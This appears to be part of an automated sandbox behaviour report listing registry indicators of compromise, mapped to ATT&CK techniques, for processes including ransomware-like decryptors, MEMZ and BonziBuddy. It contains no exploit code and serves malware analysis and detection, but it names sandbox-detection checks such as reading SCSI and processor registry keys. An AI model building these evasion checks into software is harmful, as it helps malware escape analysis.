Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ielowutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pingu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BonziBDY_4.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tree.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	myfriendpingu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ButterflyOnDesktop.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	notepad.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentSvr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DllHost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentSvr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	butterflyondesktop.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tv_enua.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	VineMemz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Pingu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MEMZ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@[email protected]
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2020	myfriendpingu.exe
5284	MSIEXEC.EXE
6404	Pingu.exe
4700	Pingu.exe

Checks SCSI registry key(s) 3 TTPs 8 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	runonce.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	runonce.exe

Enumerates system info in registry 2 TTPs 21 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Control Panel 21 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\SizeWE = "%SystemRoot%\\cursors\\size3_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Person = "%SystemRoot%\\cursors\\person_l.cur"	rundll32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Desktop\UserPreferencesMask = 9e1e078012000000	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\AppStarting = "%SystemRoot%\\cursors\\wait_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\SizeNS = "%SystemRoot%\\cursors\\size4_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Wait = "%SystemRoot%\\cursors\\busy_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Crosshair = "%SystemRoot%\\cursors\\cross_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\SizeAll = "%SystemRoot%\\cursors\\move_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\NWPen = "%SystemRoot%\\cursors\\pen_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\No = "%SystemRoot%\\cursors\\no_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\SizeNESW = "%SystemRoot%\\cursors\\size1_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\UpArrow = "%SystemRoot%\\cursors\\up_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\ = "Windows Standard (extra large)"	rundll32.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Scheme Source = "2"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Arrow = "%SystemRoot%\\cursors\\arrow_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Help = "%SystemRoot%\\cursors\\help_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Pin = "%SystemRoot%\\cursors\\pin_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\IBeam = "%SystemRoot%\\cursors\\beam_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\SizeNWSE = "%SystemRoot%\\cursors\\size2_l.cur"	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\Cursors\Hand	rundll32.exe

Modifies Internet Explorer settings 1 TTPs 18 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{4DFF8366-AE4E-11EF-A7EA-CEB9D96D8528} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\Downloads\\Untitled.png"	mspaint.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Desktop\General	mspaint.exe
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{00D18159-8466-11D0-AC63-00C04FD97575}	AgentSvr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F5BE8BDB-7DE6-11D0-91FE-00C04FD701A5}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C91-7B81-11D0-AC5F-00C04FD97575}\ = "IAgent"	AgentSvr.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C89-7B81-11D0-AC5F-00C04FD97575}\ = "IAgentAudioOutputProperties"	AgentSvr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E26DD3CD-B06C-47BA-9766-5F264B858E09}\TypeLib	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BE8-7DE6-11D0-91FE-00C04FD701A5}\ = "IAgentCtlCharacters"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6D0ECB27-9968-11D0-AC6E-00C04FD97575}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D40-2CDD-11D3-9DD0-D3CD4078982A}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{62FCAC31-2581-11D2-BAF1-00104B9E0792}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4900F6B-055F-11D4-8F9B-00104BA312D6}\TypeLib\ = "{F4900F5D-055F-11D4-8F9B-00104BA312D6}"	BonziBDY_4.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\RegistryControl.RegiCon\Clsid	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6B976287-3692-11D0-9B8A-0000C0F04C96}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66833FE4-8583-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSWinsock.Winsock\CLSID\ = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\SSCalendar.SSDayCtrl.1\CLSID\ = "{643F1350-1D07-11CE-9E52-0000C0554C0A}"	BonziBuddy432.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6549F504-C43A-43F3-B8CD-D077AF0427C8}\TypeLib	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{28E4193C-F276-4568-BCDC-DD15D88FADCC}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	BonziBDY_4.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE41-8596-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B1-713E-11CF-8AE5-00AA00C00905}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{BDD1F051-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ = "DMSWinsockControlEvents"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{065E6FE7-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\Version = "3.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4900F6B-055F-11D4-8F9B-00104BA312D6}\TypeLib\ = "{F4900F5D-055F-11D4-8F9B-00104BA312D6}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{159C2806-4A71-45B4-8D4E-74C181CD6842}\ = "CCalendarVBPeriod"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.ComMoveSize\CurVer\ = "ActiveSkin.ComMoveSize.1"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D48-2CDD-11D3-9DD0-D3CD4078982A}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1DAB85C3-803A-11D0-AC63-00C04FD97575}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D6589123-FC70-11D0-AC94-00C04FD97575}\2.0\0\win32\ = "C:\\Windows\\msagent\\AgentSvr.exe\\2"	AgentSvr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F4900F67-055F-11D4-8F9B-00104BA312D6}\LocalServer32	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4900F69-055F-11D4-8F9B-00104BA312D6}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	BonziBDY_4.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B0913410-3B44-11D1-ACBA-00C04FD97575}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\ActiveSkin.ComMoveSize\CLSID\ = "{83C2D7A1-0DE6-11D3-9DCF-9423F1B2561C}"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C74190B5-8589-11D1-B16A-00C0F0283628}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C27CCE35-8596-11D1-B16A-00C0F0283628}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2C247F21-8591-11D1-B16A-00C0F0283628}\ = "IImageList"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE0-1BF9-11D2-BAE8-00104B9E0792}\ = "ISSCheck"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{5AA1F9B0-F64C-11CD-95A8-0000C04D4C0A}\ProxyStubClsid32	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CDA1CA04-8B5D-11D0-9BC0-0000C0F04C96}\TypeLib	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BDD-7DE6-11D0-91FE-00C04FD701A5}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1EFB6596-857C-11D1-B16A-00C0F0283628}\Implemented Categories	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.Toolbar\ = "Microsoft Toolbar Control, version 6.0"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8B77181C-D3EF-11D1-8500-00C04FA34A14}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE2-1BF9-11D2-BAE8-00104B9E0792}	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{14E27A70-69F0-11CE-9425-0000C0C14E92}\TypeLib\ = "{E8671A8B-E5DD-11CD-836C-0000C0C14E92}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FDF-1BF9-11D2-BAE8-00104B9E0792}\InprocServer32\ = "C:\\Program Files (x86)\\BonziBuddy432\\ssa3d30.ocx"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C01-3910-11D1-ACB3-00C04FD97575}\ = "IAgentCtlCommandsEx"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F4043742-AC8D-4F86-88E9-F3FD3369DD8C}	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C74190B6-8589-11D1-B16A-00C0F0283628}\ToolboxBitmap32\ = "C:\\Program Files (x86)\\BonziBuddy432\\MSCOMCTL.OCX, 2"	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{66833FE6-8583-11D1-B16A-00C0F0283628}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CA478DA1-3920-11D3-9DD0-8067E4A06603}\Programmable	BonziBuddy432.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\BonziBUDDY.clsRegistration\Clsid\ = "{DED86423-10D4-4CE1-8C84-9C9EC1B43364}"	BonziBDY_4.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\InprocServer32\ThreadingModel = "Apartment"	BonziBuddy432.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E91E27A3-C5AE-11D2-8D1B-00104B9E072A}\TypeLib	BonziBuddy432.exe
